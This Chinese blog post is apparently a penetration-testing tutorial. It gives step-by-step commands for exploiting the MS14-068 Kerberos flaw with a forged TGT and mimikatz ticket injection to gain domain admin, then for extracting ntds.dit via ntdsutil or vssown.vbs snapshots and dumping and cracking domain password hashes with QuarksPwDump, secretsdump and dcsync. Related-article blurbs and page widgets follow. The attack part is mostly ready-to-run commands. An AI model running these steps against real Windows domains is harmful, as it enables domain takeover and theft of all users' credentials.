内网渗透之——域渗透中利用ms-14-068漏洞进行票据伪装获取域管账号密码

最新推荐文章于 2025-05-11 12:10:28 发布
原创 最新推荐文章于 2025-05-11 12:10:28 发布 · 2.7k 阅读 · 8 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

本文详细介绍如何利用特定漏洞进行域控渗透,包括利用漏洞伪装域管票据、导出域hash值及破解密码的方法。通过实际操作步骤,从获取域信息、票据伪造到密码破解全过程解析。

利用过程

1.利用该漏洞伪装票据

2.导出域hash值

3.破解利用hash值

一、利用漏洞伪装票据

条件

知道域名,sid,并拥有一个域普通用户的账号密码和知道域控的名称

步骤

1.拿到一台普通域用户机器,获取sid

whoami /all

2.域名,域控名获取

域名获取:

ipconfig /all  

查询域控:

net time /domain

3.上传14068py.exe,命令行输入命令进行票据伪装,会在当前目录下生成一个TGT文件

14068py.exe -u 域用户全称 -p "密码" -s sid -d 域控名全称

用户全名为:用户名@域名

4.输入klist purge可删除所有票据

5.上传mimikatz.exe,输入命令使用刚才伪装的票据

mimikatz.exe "kerberos::ptc xxxxx" exit

xxxxx处替换刚才生成的TGT文件名

6.输入klist查看票据,替换成功

7.无需输入密码即可查看域控的c盘目录,说明域管身份的票据伪装成功

dir \\域控全称\c$

二、导出域hash值

·获取ntds.dit并分析获得hash

思路

    1.票据伪装成功后远程连接,利用计划任务或远程执行控制DC执行命令(此处实验直接在dc进行,利用计划任务或远程执行控制DC执行命令点击此处跳转到详细使用方法)
    2.利用工具获取、分析得到域hash值

1.获取ntds.dit

1.1 利用ntdsutil(win8之后自带)导出ntds.dit

1.1.1 交互式shell:

输入ntdsutil进入交互式界面

输入snapshot进入快照功能

将活动实例设置为ntds

activate instance ntds

输入create创建快照

将快照挂载到c盘,此时c盘就出现了一个和c盘内容一样的快照,并且没有被占用

mount 快照名

 

退出ntdsutil,复制快照下的ntds.dit到指定路径(离线分析还需要复制快照里的Windows\System32\config\SYSTEM,在线分析省略)

copy C:\$SNAP_202003310959_VOLUMEC$\Windows\NTDS\ntds.dit c:\

再次进入ntdsutil的快照功能,删除快照

ntdsutil
snapshot
unmount 快照名

1.1.2 非交互式shell:

输入以下命令直接一次性创建快照并退出

ntdsutil snapshot "activate instance ntds" create quit quit

输入以下命令挂载刚刚生成的快照

ntdsutil snapshot "mount 快照名" quit quit

复制快照下的ntds.dit到指定路径(离线分析还需要复制快照里的Windows\System32\config\SYSTEM,在线分析省略)

copy C:\$SNAP_202003311014_VOLUMEC$\Windows\NTDS\ntds.dit c:\ntds1.dit

删除快照

ntdsutil snapshot "unmount 快照名" quit quit

1.2 vssown.vbs提取ntds.dit

上传脚本并开始运行脚本

cscript vssown.vbs /start

查看运行状态

cscript vssown.vbs /status


创建c盘的快照

cscript vssown.vbs /create C

查看快照信息

cscript vssown.vbs /list

\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1        即为c盘快照的根目录路

将快照里的ntds.dit复制到当前目录

copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\windows\ntds\ntds.dit ntds.dit

将快照里的SYSTEM复制到当前目录(离线分析需要,在线分析省略)

copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM SYSTEM

删除创建的快照

cscript vssown.vbs /delete *

停止脚本运行

cscript vssown.vbs /stop

2.分析ntds.dit

2.1 利用QuarkPwDump在线分析

上传QuarkPwDump.exe到目标机c:/

输入命令获取ntds.dit里的域用户密码

QuarksPwDump.exe --dump-hash-domain --with-history --ntds-file ntds.dit路径

2.2 利用kali里的impacket-secretsdump离线分析

复制生成的ntds.dit和SYSTEM到kali

终端输入命令破解ntds.dit

impacket-secretsdump -ntds ntds.dit -system SYSTEM local

 

·mimikatz提取hash

条件

获取普通域成员机的shell即可

步骤

在上述14068伪装票据的基础上远程连接dc

输入mimikatz.exe进入软件

提取指定域用户的hash值

lsadump::dcsync /domain:域名 /user:用户名 /csv

三、破解密码

利用破解工具,cmd5进行破解,破解不成功可尝试hash注入

点击此处查看hash注入具体使用方法

内提权之MS14-068
渗透之路,攻防之间皆学问
03-17 5246
目标:普通成员——>管理员 漏洞利用前提 控没有打MS14-068的补丁(KB3011780) 拿下一台加入的计算机 有这台内计算机的用户密码和Sid 漏洞复现 环境: win2012(192.168.10.2) 控,开启了防火墙 win7(192.168.10.5),成员 1. win7获取账户的密码及sid值 win7机器上查看管理员,可发现,并没有自己 这里使用mimikatz去抓取用户的明文密码 mimikatz.exe "privilege:....
红队内网攻防渗透内网渗透内网各种工具平台的使用
HACKONE的博客
04-10 1741
红队内网攻防渗透内网各种工具平台的使用 内网各种工具平台的使用
Catalyze安全知识库
mashiro_hibiki的博客
05-21 477
高质量安全知识星球社区,致力于漏洞挖掘,渗透技巧,安全资料,星球承诺会持续更新0/1/NDay及对应的批量利用工具,团队内部漏洞库,内外网攻防技巧,你所需要的各类安全工具和资料以及团队师傅们最新的学习研究成果。分享行业内最新动态,解答交流各类技术问题。涉及方向包括Web渗透、免杀绕过、红蓝攻防、代码审计、应急响应、安全培训、CTF、小白入门、职业规划和疑难解答。
环境搭建到 MS14-068 提升为权限
weixin_30827565的博客
05-16 147
搭建环境 修改win2003(控)计算机名为"DCwin03",修改ip     配置成 DNS 服务器,"开始--控制面板--添加或删除程序--添加/删除 windows 组件"     运行:"dcpromo","新控制器--在新林中的",下一步,设置还原密码     运行"dsa.msc" 添加一个普通用户   添加 xp 到中     通过 MS14-0...
MS14-068提权)漏洞复现
weixin_50985113的博客
06-29 994
这里便用到了我们之前所讲到的 PAC 这个东西,PAC 是用来验证 Client 的访问权限的,它会被TGT 里发送给 Client,然后由 Client 发送给 TGS。但也恰恰是这个 PAC 造成了 MS14-068 这个漏洞。该漏洞是位于 kdcsvc.dll 控制器的密钥分发中心(KDC)服务中的 Windows 漏洞,它允许经过身份验证的用户在其获得的票证 TGT 中插入任意的 PAC。普通用户可以通过呈现具有改变了 PAC 的 TGT 来伪造票据获得管理员权限。
复现MS14-068
这里是Y.lin的博客,你好,很高兴云里相遇!希望能给你提供一点帮助
05-23 1323
MS14-068
内网拓展——域渗透ms-14-068利用
cxrpty的博客
03-30 1368
实验条件: 1.必须知道 2.必须知道账号密码 3.sid 4.控 实验步骤: 一、利用ms-14-068漏洞进行票据伪造 1.获取普通用户的sid whoami /all 2.获取名和控名 ipconfig /all net view /domain或net time /domain 3.上传14068py.exe,输入命令进行票据伪装,生成...
渗透测试 ( 3 ) --- Metasploit Framework ( MSF )
墨鱼菜鸡
07-11 5152
白嫖 Metasploit Pro 2022:https://zhuanlan.zhihu.com/p/449836479 白嫖 Metasploit Pro 2022:http://t.zoukankan.com/hxlinux-p-15787814.html 好东西之 metasploit pro:https://www.52pojie.cn/thr...
Penetration_Testing_POC-About 渗透测试有关的POC、EXP、脚本、提权、小工具等
weixin_46280935的博客
09-10 6521
Penetration_Testing_POC 搜集有关渗透测试中用到的POC、脚本、工具、文章等姿势分享,作为笔记吧,欢迎补充。 Penetration_Testing_POC 请善用搜索[Ctrl+F]查找 IOT Device&Mobile Phone Web APP 提权辅助相关 PC tools-小工具集合 文章/书籍/教程相关 说明 请善用搜索[Ctrl+F]查找 IOT Device&Mobile Phone 天翼创维awifi路由器存在多处未授权访问漏
《黑客攻防从入门到精通:工具篇》全15章万字深度总结——从工具解析到实战攻防,构建完整网络安全知识体系
FFNCL的博客
03-12 2634
本书通过15章系统化教学,不仅传授工具使用,更强调攻防思维的平衡:《黑客攻防从入门到精通:工具篇》的价值不仅在于工具使用教学,更在于引导读者理解攻防对抗的本质——安全是持续的过程,而非静态的结果。通过系统化工具链的掌握与伦理意识的培养,读者将能够站在防御者的高度,构建主动、动态、纵深的网络安全体系。注:文章对书中的内容还没有详细描述,主要是书中讲解的一些工具在目前来说已经过时或者无法安全下载,所以文章中给出的一些工具都是目前常用的工具。喜欢就点点关注和评论一起进步。
MS14-068域渗透
bailandawang123的博客
03-10 758
ms14068主要是通过伪造管的tgt,将普通用户提升为管用户,从而控制控。
MS14-068漏洞复现】
一纸荒芜的博客
08-26 3935
ms14-068漏洞复现
渗透测试中的域渗透MS14-068控提权+票据传递攻击PTT
没有网络安全就没有国家安全
03-13 972
渗透测试中的域渗透MS14-068控提权+票据传递攻击PTT
内网渗透】——MS14-068漏洞利用以及复现黄金票据
最新发布
weixin_73595045的博客
05-11 1516
本文详细介绍了MS14-068漏洞利用与复现过程,重点分析了Kerberos认证机制及其漏洞原理。文章首先搭建了实验环境,包括控制器和用户机,并详细描述了Kerberos认证流程,特别是TGT和ST的获取过程。接着,文章深入探讨了PAC(特权属性证书)的作用及其在Kerberos认证中的重要性。随后,文章详细阐述了MS14-068漏洞利用思路,包括如何伪造PAC并利用漏洞提升用户权限。最后,文章通过实验步骤展示了如何使用PyKEK工具生成高权限票据,并通过Mimikatz将票据注入内存,成功实现权
域渗透 | kerberos认证及过程中产生的攻击
st3pby的博客
02-20 7568
Windows认证一般包括本地认证(NTLM HASH)和认证(kerberos)。认证的原理网上有很多文章。如果喜欢听视频课程的话,这里推荐倾旋师傅的分享课本篇文章主要内容是Kerberos认证过程中产生的攻击。Kerberos是由麻省理工学院提出的一种网络身份验证协议。它旨在通过使用密钥加密技术为客户端/服务器应用程序提供强身份验证。Kerberos协议有两个基础认证模块:和,以及微软扩展的两个认证模块S4U和PAC。kerberos是一种基于票据的认证方式。
内网安全:非约束委派 约束委派 资源约束委派
qq_50854662的博客
06-03 369
内网安全:非约束委派 约束委派 资源约束委派
Kerberos认证问题的调试试验
web开发
10-10 600
Kerberos作为一种windows推荐的集成认证方式被广泛的应用,也有很多文章介绍Kerberos认证方式,这里通过一个Kerberos认证问题的调试试验来介绍一下Kerberos的认证流程以及相关的调试工具和方法。Kerberos认证流程 总的来说Kerberos是通过统一的认证服务器来对客户端进行认证,认证成功后客户端才能取得访问真正服务器的凭据。所以认证流程中涉及了三个方面如下图所示。...
账号弱口令扫描
wdy0078的博客
12-12 3203
账号弱口令扫描工具准备:导出数据库文件:功能快捷键合理的创建标题,有助于目录的生成如何改变文本的样式插入链接与图片如何插入一段漂亮的代码片生成一个适合你的列表创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也是必不可少的KaTeX数学公式新的甘特图功能,丰富你的文章UML 图表FLowchart流程图导出与导入导出导入 工具准备: 1.vssadm...
通过 Cobalt Strike 利用 ms14-068
weixin_30737363的博客
11-19 932
拓扑图 攻击者(kali) 位于 192.168.245.0/24 网段,环境位于 192.168.31.0/24 网段。 中有一台 win7 有两张网卡,可以同时访问两个网段,以这台机器作为跳板机进入环境。 假设现在已经有一组用户的账号密码 user1 321!@#qwe 获取用户的 sid whoami /user 下面使用 pykek 生成票据,首先用 cs 开一个 socks...
授权渗透实践:利用MS14-68漏洞操控内网
作者注意到控未打上KB3011780补丁,因此利用Mimikatz工具(一个强大的Windows安全工具集)和MS14-068漏洞exploit来获取控的系统信息,包括清除内存中的Kerberos票据。 接下来,作者通过执行`whoami/all`命令...
评论 3
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值